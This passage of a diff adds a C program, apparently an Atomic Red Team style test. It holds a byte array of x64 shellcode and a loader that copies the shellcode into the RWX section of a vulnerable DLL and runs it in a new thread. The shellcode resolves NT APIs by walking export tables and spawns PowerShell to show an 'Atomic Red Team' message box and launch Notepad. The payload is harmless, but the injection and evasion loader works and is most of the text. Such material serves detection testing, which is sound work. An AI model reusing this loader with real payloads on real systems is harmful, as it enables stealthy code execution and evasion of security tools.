0x85,0x0d,0x03,0x00,0x00,0x66,0x89,0x85,0x10,0x03, + 0x00,0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x0f, + 0xb6,0x00,0x88,0x85,0x0c,0x03,0x00,0x00,0x48,0x8b, + 0x85,0xc0,0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff, + 0x00,0x00,0x00,0x7e,0x13,0x48,0x8b,0x85,0xc0,0x02, + 0x00,0x00,0x0f,0xb7,0x00,0x66,0x89,0x85,0x14,0x03, + 0x00,0x00,0xeb,0x46,0x0f,0xbe,0x85,0x0c,0x03,0x00, + 0x00,0x83,0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0x0c, + 0x03,0x00,0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe, + 0x85,0x0c,0x03,0x00,0x00,0x83,0xc0,0x20,0x88,0x85, + 0x0d,0x03,0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0x0c, + 0x03,0x00,0x00,0x88,0x85,0x0d,0x03,0x00,0x00,0x66, + 0x0f,0xbe,0x85,0x0d,0x03,0x00,0x00,0x66,0x89,0x85, + 0x14,0x03,0x00,0x00,0x0f,0xb7,0x85,0x10,0x03,0x00, + 0x00,0x0f,0xb7,0x8d,0x14,0x03,0x00,0x00,0x2b,0xc1, + 0x89,0x85,0x08,0x03,0x00,0x00,0x83,0xbd,0x08,0x03, + 0x00,0x00,0x00,0x75,0x10,0x48,0x8b,0x85,0x00,0x03, + 
0x00,0x00,0x48,0x89,0x85,0xf8,0x02,0x00,0x00,0xeb, + 0x25,0x48,0x8b,0x85,0xb8,0x02,0x00,0x00,0x48,0x8b, + 0x00,0x48,0x89,0x85,0xb8,0x02,0x00,0x00,0x48,0x8b, + 0x85,0xb0,0x02,0x00,0x00,0x48,0x39,0x85,0xb8,0x02, + 0x00,0x00,0x0f,0x85,0xf9,0xfc,0xff,0xff,0x48,0x8b, + 0x85,0xd0,0x02,0x00,0x00,0x48,0x8b,0x40,0x30,0x48, + 0x89,0x85,0x18,0x03,0x00,0x00,0x48,0x8b,0x85,0x18, + 0x03,0x00,0x00,0x48,0x63,0x40,0x3c,0x48,0x8b,0x8d, + 0x18,0x03,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1, + 0x48,0x89,0x85,0x20,0x03,0x00,0x00,0xb8,0x08,0x00, + 0x00,0x00,0x48,0x6b,0xc0,0x00,0x48,0x8b,0x8d,0x20, + 0x03,0x00,0x00,0x8b,0x84,0x01,0x88,0x00,0x00,0x00, + 0x48,0x8b,0x8d,0x18,0x03,0x00,0x00,0x48,0x03,0xc8, + 0x48,0x8b,0xc1,0x48,0x89,0x85,0x28,0x03,0x00,0x00, + 0x48,0x8b,0x85,0x28,0x03,0x00,0x00,0x8b,0x40,0x20, + 0x48,0x8b,0x8d,0x18,0x03,0x00,0x00,0x48,0x03,0xc8, + 0x48,0x8b,0xc1,0x48,0x89,0x85,0x30,0x03,0x00,0x00, + 0x48,0xb8,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41, + 0x48,0x89,0x45,0x10,0xc7,0x85,0x38,0x03,0x00,0x00, + 0x00,0x00,0x00,0x00,0x48,0x63,0x85,0x38,0x03,0x00, + 0x00,0x48,0x8b,0x8d,0x30,0x03,0x00,0x00,0x48,0x63, + 0x04,0x81,0x48,0x8b,0x8d,0x18,0x03,0x00,0x00,0x48, + 0x8b,0x55,0x10,0x48,0x39,0x14,0x01,0x74,0x10,0x8b, + 0x85,0x38,0x03,0x00,0x00,0xff,0xc0,0x89,0x85,0x38, + 0x03,0x00,0x00,0xeb,0xcd,0x48,0x8b,0x85,0x28,0x03, + 0x00,0x00,0x8b,0x40,0x24,0x48,0x8b,0x8d,0x18,0x03, + 0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89, + 0x85,0x40,0x03,0x00,0x00,0x48,0x8b,0x85,0x28,0x03, + 0x00,0x00,0x8b,0x40,0x1c,0x48,0x8b,0x8d,0x18,0x03, + 0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89, + 0x85,0x48,0x03,0x00,0x00,0x48,0x63,0x85,0x38,0x03, + 0x00,0x00,0x48,0x8b,0x8d,0x40,0x03,0x00,0x00,0x48, + 0x0f,0xbf,0x04,0x41,0x48,0x8b,0x8d,0x48,0x03,0x00, + 0x00,0x48,0x63,0x04,0x81,0x48,0x8b,0x8d,0x18,0x03, + 0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89, + 0x85,0x50,0x03,0x00,0x00,0x48,0x8b,0x85,0x18,0x03, + 0x00,0x00,0x48,0x89,0x85,0x58,0x03,0x00,0x00,0x48, + 
0x8b,0x85,0xf8,0x02,0x00,0x00,0x48,0x89,0x85,0x60, + 0x03,0x00,0x00,0x48,0x8b,0x85,0x60,0x03,0x00,0x00, + 0xc7,0x80,0x14,0x01,0x00,0x00,0xff,0xff,0xff,0xff, + 0x48,0x8b,0x85,0xf8,0x02,0x00,0x00,0x48,0x8b,0x40, + 0x30,0x48,0x89,0x85,0x68,0x03,0x00,0x00,0x48,0xb8, + 0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x48,0x89, + 0x45,0x10,0x48,0xc7,0x45,0x18,0x61,0x72,0x79,0x41, + 0x48,0x8d,0x55,0x10,0x48,0x8b,0x8d,0x58,0x03,0x00, + 0x00,0xff,0x95,0x50,0x03,0x00,0x00,0x48,0x89,0x85, + 0x70,0x03,0x00,0x00,0x48,0xb8,0x52,0x74,0x6c,0x41, + 0x6c,0x6c,0x6f,0x63,0x48,0x89,0x45,0x10,0x48,0xb8, + 0x61,0x74,0x65,0x48,0x65,0x61,0x70,0x00,0x48,0x89, + 0x45,0x18,0x48,0x8d,0x55,0x10,0x48,0x8b,0x8d,0x68, + 0x03,0x00,0x00,0xff,0x95,0x50,0x03,0x00,0x00,0x48, + 0x89,0x85,0x78,0x03,0x00,0x00,0x48,0xb8,0x52,0x74, + 0x6c,0x43,0x72,0x65,0x61,0x74,0x48,0x89,0x45,0x38, + 0x48,0xb8,0x65,0x50,0x72,0x6f,0x63,0x65,0x73,0x73, + 0x48,0x89,0x45,0x40,0x48,0xb8,0x50,0x61,0x72,0x61, + 0x6d,0x65,0x74,0x65,0x48,0x89,0x45,0x48,0x48,0xc7, + 0x45,0x50,0x72,0x73,0x45,0x78,0x48,0x8d,0x55,0x38, + 0x48,0x8b,0x8d,0x68,0x03,0x00,0x00,0xff,0x95,0x50, + 0x03,0x00,0x00,0x48,0x89,0x85,0x80,0x03,0x00,0x00, + 0x48,0xb8,0x4e,0x74,0x43,0x72,0x65,0x61,0x74,0x65, + 0x48,0x89,0x45,0x20,0x48,0xb8,0x55,0x73,0x65,0x72, + 0x50,0x72,0x6f,0x63,0x48,0x89,0x45,0x28,0x48,0xc7, + 0x45,0x30,0x65,0x73,0x73,0x00,0x48,0x8d,0x55,0x20, + 0x48,0x8b,0x8d,0x68,0x03,0x00,0x00,0xff,0x95,0x50, + 0x03,0x00,0x00,0x48,0x89,0x85,0x88,0x03,0x00,0x00, + 0x48,0xb8,0x52,0x74,0x6c,0x49,0x6e,0x69,0x74,0x55, + 0x48,0x89,0x45,0x20,0x48,0xb8,0x6e,0x69,0x63,0x6f, + 0x64,0x65,0x53,0x74,0x48,0x89,0x45,0x28,0x48,0xc7, + 0x45,0x30,0x72,0x69,0x6e,0x67,0x48,0x8d,0x55,0x20, + 0x48,0x8b,0x8d,0x68,0x03,0x00,0x00,0xff,0x95,0x50, + 0x03,0x00,0x00,0x48,0x89,0x85,0x90,0x03,0x00,0x00, + 0x48,0xb8,0x5c,0x00,0x3f,0x00,0x3f,0x00,0x5c,0x00, + 0x48,0x89,0x45,0x60,0x48,0xb8,0x43,0x00,0x3a,0x00, + 0x5c,0x00,0x57,0x00,0x48,0x89,0x45,0x68,0x48,0xb8, + 
0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x48,0x89, + 0x45,0x70,0x48,0xb8,0x77,0x00,0x73,0x00,0x5c,0x00, + 0x53,0x00,0x48,0x89,0x45,0x78,0x48,0xb8,0x79,0x00, + 0x73,0x00,0x74,0x00,0x65,0x00,0x48,0x89,0x85,0x80, + 0x00,0x00,0x00,0x48,0xb8,0x6d,0x00,0x33,0x00,0x32, + 0x00,0x5c,0x00,0x48,0x89,0x85,0x88,0x00,0x00,0x00, + 0x48,0xb8,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00, + 0x48,0x89,0x85,0x90,0x00,0x00,0x00,0x48,0xb8,0x6f, + 0x00,0x77,0x00,0x73,0x00,0x50,0x00,0x48,0x89,0x85, + 0x98,0x00,0x00,0x00,0x48,0xb8,0x6f,0x00,0x77,0x00, + 0x65,0x00,0x72,0x00,0x48,0x89,0x85,0xa0,0x00,0x00, + 0x00,0x48,0xb8,0x53,0x00,0x68,0x00,0x65,0x00,0x6c, + 0x00,0x48,0x89,0x85,0xa8,0x00,0x00,0x00,0x48,0xb8, + 0x6c,0x00,0x5c,0x00,0x76,0x00,0x31,0x00,0x48,0x89, + 0x85,0xb0,0x00,0x00,0x00,0x48,0xb8,0x2e,0x00,0x30, + 0x00,0x5c,0x00,0x70,0x00,0x48,0x89,0x85,0xb8,0x00, + 0x00,0x00,0x48,0xb8,0x6f,0x00,0x77,0x00,0x65,0x00, + 0x72,0x00,0x48,0x89,0x85,0xc0,0x00,0x00,0x00,0x48, + 0xb8,0x73,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x48, + 0x89,0x85,0xc8,0x00,0x00,0x00,0x48,0xb8,0x6c,0x00, + 0x2e,0x00,0x65,0x00,0x78,0x00,0x48,0x89,0x85,0xd0, + 0x00,0x00,0x00,0x48,0xc7,0x85,0xd8,0x00,0x00,0x00, + 0x65,0x00,0x00,0x00,0x48,0x8d,0x55,0x60,0x48,0x8d, + 0x8d,0x98,0x03,0x00,0x00,0xff,0x95,0x90,0x03,0x00, + 0x00,0x48,0xb8,0x5c,0x00,0x3f,0x00,0x3f,0x00,0x5c, + 0x00,0x48,0x89,0x85,0xe0,0x00,0x00,0x00,0x48,0xb8, + 0x43,0x00,0x3a,0x00,0x5c,0x00,0x57,0x00,0x48,0x89, + 0x85,0xe8,0x00,0x00,0x00,0x48,0xb8,0x69,0x00,0x6e, + 0x00,0x64,0x00,0x6f,0x00,0x48,0x89,0x85,0xf0,0x00, + 0x00,0x00,0x48,0xb8,0x77,0x00,0x73,0x00,0x5c,0x00, + 0x53,0x00,0x48,0x89,0x85,0xf8,0x00,0x00,0x00,0x48, + 0xb8,0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x48, + 0x89,0x85,0x00,0x01,0x00,0x00,0x48,0xb8,0x6d,0x00, + 0x33,0x00,0x32,0x00,0x5c,0x00,0x48,0x89,0x85,0x08, + 0x01,0x00,0x00,0x48,0xb8,0x57,0x00,0x69,0x00,0x6e, + 0x00,0x64,0x00,0x48,0x89,0x85,0x10,0x01,0x00,0x00, + 0x48,0xb8,0x6f,0x00,0x77,0x00,0x73,0x00,0x50,0x00, + 
0x48,0x89,0x85,0x18,0x01,0x00,0x00,0x48,0xb8,0x6f, + 0x00,0x77,0x00,0x65,0x00,0x72,0x00,0x48,0x89,0x85, + 0x20,0x01,0x00,0x00,0x48,0xb8,0x53,0x00,0x68,0x00, + 0x65,0x00,0x6c,0x00,0x48,0x89,0x85,0x28,0x01,0x00, + 0x00,0x48,0xb8,0x6c,0x00,0x5c,0x00,0x76,0x00,0x31, + 0x00,0x48,0x89,0x85,0x30,0x01,0x00,0x00,0x48,0xb8, + 0x2e,0x00,0x30,0x00,0x5c,0x00,0x70,0x00,0x48,0x89, + 0x85,0x38,0x01,0x00,0x00,0x48,0xb8,0x6f,0x00,0x77, + 0x00,0x65,0x00,0x72,0x00,0x48,0x89,0x85,0x40,0x01, + 0x00,0x00,0x48,0xb8,0x73,0x00,0x68,0x00,0x65,0x00, + 0x6c,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0x48, + 0xb8,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x48, + 0x89,0x85,0x50,0x01,0x00,0x00,0x48,0xb8,0x65,0x00, + 0x20,0x00,0x2d,0x00,0x43,0x00,0x48,0x89,0x85,0x58, + 0x01,0x00,0x00,0x48,0xb8,0x6f,0x00,0x6d,0x00,0x6d, + 0x00,0x61,0x00,0x48,0x89,0x85,0x60,0x01,0x00,0x00, + 0x48,0xb8,0x6e,0x00,0x64,0x00,0x20,0x00,0x22,0x00, + 0x48,0x89,0x85,0x68,0x01,0x00,0x00,0x48,0xb8,0x41, + 0x00,0x64,0x00,0x64,0x00,0x2d,0x00,0x48,0x89,0x85, + 0x70,0x01,0x00,0x00,0x48,0xb8,0x54,0x00,0x79,0x00, + 0x70,0x00,0x65,0x00,0x48,0x89,0x85,0x78,0x01,0x00, + 0x00,0x48,0xb8,0x20,0x00,0x2d,0x00,0x41,0x00,0x73, + 0x00,0x48,0x89,0x85,0x80,0x01,0x00,0x00,0x48,0xb8, + 0x73,0x00,0x65,0x00,0x6d,0x00,0x62,0x00,0x48,0x89, + 0x85,0x88,0x01,0x00,0x00,0x48,0xb8,0x6c,0x00,0x79, + 0x00,0x4e,0x00,0x61,0x00,0x48,0x89,0x85,0x90,0x01, + 0x00,0x00,0x48,0xb8,0x6d,0x00,0x65,0x00,0x20,0x00, + 0x50,0x00,0x48,0x89,0x85,0x98,0x01,0x00,0x00,0x48, + 0xb8,0x72,0x00,0x65,0x00,0x73,0x00,0x65,0x00,0x48, + 0x89,0x85,0xa0,0x01,0x00,0x00,0x48,0xb8,0x6e,0x00, + 0x74,0x00,0x61,0x00,0x74,0x00,0x48,0x89,0x85,0xa8, + 0x01,0x00,0x00,0x48,0xb8,0x69,0x00,0x6f,0x00,0x6e, + 0x00,0x46,0x00,0x48,0x89,0x85,0xb0,0x01,0x00,0x00, + 0x48,0xb8,0x72,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, + 0x48,0x89,0x85,0xb8,0x01,0x00,0x00,0x48,0xb8,0x77, + 0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x48,0x89,0x85, + 0xc0,0x01,0x00,0x00,0x48,0xb8,0x3b,0x00,0x20,0x00, + 
0x5b,0x00,0x53,0x00,0x48,0x89,0x85,0xc8,0x01,0x00, + 0x00,0x48,0xb8,0x79,0x00,0x73,0x00,0x74,0x00,0x65, + 0x00,0x48,0x89,0x85,0xd0,0x01,0x00,0x00,0x48,0xb8, + 0x6d,0x00,0x2e,0x00,0x57,0x00,0x69,0x00,0x48,0x89, + 0x85,0xd8,0x01,0x00,0x00,0x48,0xb8,0x6e,0x00,0x64, + 0x00,0x6f,0x00,0x77,0x00,0x48,0x89,0x85,0xe0,0x01, + 0x00,0x00,0x48,0xb8,0x73,0x00,0x2e,0x00,0x4d,0x00, + 0x65,0x00,0x48,0x89,0x85,0xe8,0x01,0x00,0x00,0x48, + 0xb8,0x73,0x00,0x73,0x00,0x61,0x00,0x67,0x00,0x48, + 0x89,0x85,0xf0,0x01,0x00,0x00,0x48,0xb8,0x65,0x00, + 0x42,0x00,0x6f,0x00,0x78,0x00,0x48,0x89,0x85,0xf8, + 0x01,0x00,0x00,0x48,0xb8,0x5d,0x00,0x3a,0x00,0x3a, + 0x00,0x53,0x00,0x48,0x89,0x85,0x00,0x02,0x00,0x00, + 0x48,0xb8,0x68,0x00,0x6f,0x00,0x77,0x00,0x28,0x00, + 0x48,0x89,0x85,0x08,0x02,0x00,0x00,0x48,0xb8,0x27, + 0x00,0x41,0x00,0x74,0x00,0x6f,0x00,0x48,0x89,0x85, + 0x10,0x02,0x00,0x00,0x48,0xb8,0x6d,0x00,0x69,0x00, + 0x63,0x00,0x20,0x00,0x48,0x89,0x85,0x18,0x02,0x00, + 0x00,0x48,0xb8,0x52,0x00,0x65,0x00,0x64,0x00,0x20, + 0x00,0x48,0x89,0x85,0x20,0x02,0x00,0x00,0x48,0xb8, + 0x54,0x00,0x65,0x00,0x61,0x00,0x6d,0x00,0x48,0x89, + 0x85,0x28,0x02,0x00,0x00,0x48,0xb8,0x27,0x00,0x2c, + 0x00,0x20,0x00,0x27,0x00,0x48,0x89,0x85,0x30,0x02, + 0x00,0x00,0x48,0xb8,0x57,0x00,0x61,0x00,0x72,0x00, + 0x6e,0x00,0x48,0x89,0x85,0x38,0x02,0x00,0x00,0x48, + 0xb8,0x69,0x00,0x6e,0x00,0x67,0x00,0x27,0x00,0x48, + 0x89,0x85,0x40,0x02,0x00,0x00,0x48,0xb8,0x2c,0x00, + 0x20,0x00,0x27,0x00,0x4f,0x00,0x48,0x89,0x85,0x48, + 0x02,0x00,0x00,0x48,0xb8,0x4b,0x00,0x27,0x00,0x2c, + 0x00,0x20,0x00,0x48,0x89,0x85,0x50,0x02,0x00,0x00, + 0x48,0xb8,0x27,0x00,0x57,0x00,0x61,0x00,0x72,0x00, + 0x48,0x89,0x85,0x58,0x02,0x00,0x00,0x48,0xb8,0x6e, + 0x00,0x69,0x00,0x6e,0x00,0x67,0x00,0x48,0x89,0x85, + 0x60,0x02,0x00,0x00,0x48,0xb8,0x27,0x00,0x29,0x00, + 0x3b,0x00,0x20,0x00,0x48,0x89,0x85,0x68,0x02,0x00, + 0x00,0x48,0xb8,0x53,0x00,0x74,0x00,0x61,0x00,0x72, + 0x00,0x48,0x89,0x85,0x70,0x02,0x00,0x00,0x48,0xb8, + 
0x74,0x00,0x2d,0x00,0x50,0x00,0x72,0x00,0x48,0x89, + 0x85,0x78,0x02,0x00,0x00,0x48,0xb8,0x6f,0x00,0x63, + 0x00,0x65,0x00,0x73,0x00,0x48,0x89,0x85,0x80,0x02, + 0x00,0x00,0x48,0xb8,0x73,0x00,0x20,0x00,0x27,0x00, + 0x6e,0x00,0x48,0x89,0x85,0x88,0x02,0x00,0x00,0x48, + 0xb8,0x6f,0x00,0x74,0x00,0x65,0x00,0x70,0x00,0x48, + 0x89,0x85,0x90,0x02,0x00,0x00,0x48,0xb8,0x61,0x00, + 0x64,0x00,0x2e,0x00,0x65,0x00,0x48,0x89,0x85,0x98, + 0x02,0x00,0x00,0x48,0xb8,0x78,0x00,0x65,0x00,0x27, + 0x00,0x22,0x00,0x48,0x89,0x85,0xa0,0x02,0x00,0x00, + 0x48,0x8d,0x95,0xe0,0x00,0x00,0x00,0x48,0x8d,0x8d, + 0xa8,0x03,0x00,0x00,0xff,0x95,0x90,0x03,0x00,0x00, + 0x48,0xc7,0x85,0xb8,0x03,0x00,0x00,0x00,0x00,0x00, + 0x00,0xc7,0x44,0x24,0x50,0x01,0x00,0x00,0x00,0x48, + 0xc7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0x48,0xc7, + 0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xc7,0x44, + 0x24,0x38,0x00,0x00,0x00,0x00,0x48,0xc7,0x44,0x24, + 0x30,0x00,0x00,0x00,0x00,0x48,0xc7,0x44,0x24,0x28, + 0x00,0x00,0x00,0x00,0x48,0x8d,0x85,0xa8,0x03,0x00, + 0x00,0x48,0x89,0x44,0x24,0x20,0x45,0x33,0xc9,0x45, + 0x33,0xc0,0x48,0x8d,0x95,0x98,0x03,0x00,0x00,0x48, + 0x8d,0x8d,0xb8,0x03,0x00,0x00,0xff,0x95,0x80,0x03, + 0x00,0x00,0x48,0x8d,0x85,0xc0,0x03,0x00,0x00,0x48, + 0x8b,0xf8,0x33,0xc0,0xb9,0x58,0x00,0x00,0x00,0xf3, + 0xaa,0x48,0xc7,0x85,0xc0,0x03,0x00,0x00,0x58,0x00, + 0x00,0x00,0xc7,0x85,0xc8,0x03,0x00,0x00,0x00,0x00, + 0x00,0x00,0xb8,0x08,0x00,0x00,0x00,0x48,0x6b,0xc0, + 0x01,0x41,0xb8,0x20,0x00,0x00,0x00,0xba,0x08,0x00, + 0x00,0x00,0x48,0x8b,0x4d,0x00,0x48,0x8b,0x4c,0x01, + 0x28,0xff,0x95,0x78,0x03,0x00,0x00,0x48,0x89,0x85, + 0x20,0x04,0x00,0x00,0x48,0x8b,0x85,0x20,0x04,0x00, + 0x00,0x48,0xc7,0x00,0x28,0x00,0x00,0x00,0xb8,0x20, + 0x00,0x00,0x00,0x48,0x6b,0xc0,0x00,0x48,0x8b,0x8d, + 0x20,0x04,0x00,0x00,0xc7,0x44,0x01,0x08,0x05,0x00, + 0x02,0x00,0xb8,0x20,0x00,0x00,0x00,0x48,0x6b,0xc0, + 0x00,0x0f,0xb7,0x8d,0x98,0x03,0x00,0x00,0x48,0x8b, + 0x95,0x20,0x04,0x00,0x00,0x48,0x89,0x4c,0x02,0x10, + 
0xb8,0x20,0x00,0x00,0x00,0x48,0x6b,0xc0,0x00,0x48,
+ 0x8b,0x8d,0x20,0x04,0x00,0x00,0x48,0x8b,0x95,0xa0,
+ 0x03,0x00,0x00,0x48,0x89,0x54,0x01,0x18,0x48,0xc7,
+ 0x85,0x30,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x48,
+ 0x8b,0x85,0x20,0x04,0x00,0x00,0x48,0x89,0x44,0x24,
+ 0x50,0x48,0x8d,0x85,0xc0,0x03,0x00,0x00,0x48,0x89,
+ 0x44,0x24,0x48,0x48,0x8b,0x85,0xb8,0x03,0x00,0x00,
+ 0x48,0x89,0x44,0x24,0x40,0xc7,0x44,0x24,0x38,0x00,
+ 0x00,0x00,0x00,0xc7,0x44,0x24,0x30,0x00,0x00,0x00,
+ 0x00,0x48,0xc7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,
+ 0x48,0xc7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,
+ 0xb9,0xff,0xff,0x1f,0x00,0x41,0xb8,0xff,0xff,0x1f,
+ 0x00,0x48,0x8d,0x95,0x30,0x04,0x00,0x00,0x48,0x8d,
+ 0x8d,0x28,0x04,0x00,0x00,0xff,0x95,0x88,0x03,0x00,
+ 0x00,0x89,0x85,0x38,0x04,0x00,0x00,0x48,0xb8,0x4e,
+ 0x74,0x53,0x75,0x73,0x70,0x65,0x6e,0x48,0x89,0x45,
+ 0x10,0x48,0xb8,0x64,0x54,0x68,0x72,0x65,0x61,0x64,
+ 0x00,0x48,0x89,0x45,0x18,0x48,0x8d,0x55,0x10,0x48,
+ 0x8b,0x8d,0x68,0x03,0x00,0x00,0xff,0x95,0x50,0x03,
+ 0x00,0x00,0x48,0x89,0x85,0x40,0x04,0x00,0x00,0x33,
+ 0xd2,0x48,0xc7,0xc1,0xfe,0xff,0xff,0xff,0xff,0x95,
+ 0x40,0x04,0x00,0x00,0x48,0x8d,0xa5,0x18,0x05,0x00,
+ 0x00,0x5f,0x5d,0xc3
+ };
+
+// Define the prototype for RtlCopyMemory
+typedef VOID (NTAPI *pfnRtlCopyMemory)(VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length);
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) {
+ printf("[+] Usage: %s <module path> <offset> \n", argv[0]);
+ return 1;
+ }
+
+ const char* modulePath = argv[1];
+ DWORD offset = (DWORD)strtol(argv[2], NULL, 0);
+
+ HANDLE hDll = LoadLibrary(modulePath);
+ if (hDll == NULL) {
+ printf("[-] Failed to LoadLibrary: error %d\n", GetLastError());
+ return 1;
+ }
+
+ MODULEINFO info;
+ if (!GetModuleInformation((HANDLE)-1, hDll, &info, sizeof(MODULEINFO))) {
+ printf("[-] Failed to GetModuleInformation: error %d\n", GetLastError());
+ return 1;
+ }
+
+ printf("[+] Vulnerable dll base address: %p\n", info.lpBaseOfDll);
+ // printf("[+] DLL address: %p\n", hDll);
+ PVOID rwxSection = (PVOID)((ULONG_PTR)info.lpBaseOfDll + offset);
+ printf("[+] RWX section address: %p\n", rwxSection);
+ printf("[+] Shellcode address: %p\n", shellcode);
+ printf("[+] Shellcode size: %d\n", sizeof(shellcode));
+
+ // Create SectionDescriptor
+ SectionDescriptor descriptor = {
+ rwxSection,
+ (LPVOID)((PBYTE)rwxSection + sizeof(shellcode)) // Assuming shellcode fits within a single page and doesn't exceed the section size
+ };
+
+ // Dynamically load RtlCopyMemory from ntdll.dll
+ HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
+ if (hNtdll == NULL) { //10059
+ printf("[-] GetModuleHandleA failed to load ntdll.dll: error %d\n", GetLastError());
+ return 1;
+ }
+
+ pfnRtlCopyMemory RtlCopyMem = (pfnRtlCopyMemory)GetProcAddress(hNtdll, "RtlCopyMemory");
+ if (RtlCopyMem == NULL) {
+ printf("[-] GetProcAddress failed for RtlCopyMemory: error %d\n", GetLastError());
+ return 1;
+ }
+
+ // Use the dynamically loaded RtlCopyMemory to copy the shellcode
+ RtlCopyMem(rwxSection, shellcode, sizeof(shellcode));
+
+ // Execute the code
+ HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)rwxSection, NULL, 0, NULL);
+ if (hThread == NULL) {
+ printf("[-] CreateThread failed: %d\n", GetLastError());
+ return 1;
+ }
+
+ if (WaitForSingleObject(hThread, 5000) == WAIT_TIMEOUT) { // Wait 5 seconds
+ TerminateThread(hThread, 0); // Forcibly terminates the thread
+ printf("[+] Thread was terminated.\n");
+ }
+
+ // Get the exit code of the thread.
+ DWORD exitCode = 0;
+ if (!GetExitCodeThread(hThread, &exitCode)) {
+ printf("[-] GetExitCodeThread failed: %d\n", GetLastError());
+ } else {
+ printf("[+] Thread exited with code: %lu\n", exitCode);
+ }
+
+ CloseHandle(hThread);
+
+ return 0;
+}
\ No newline at end of file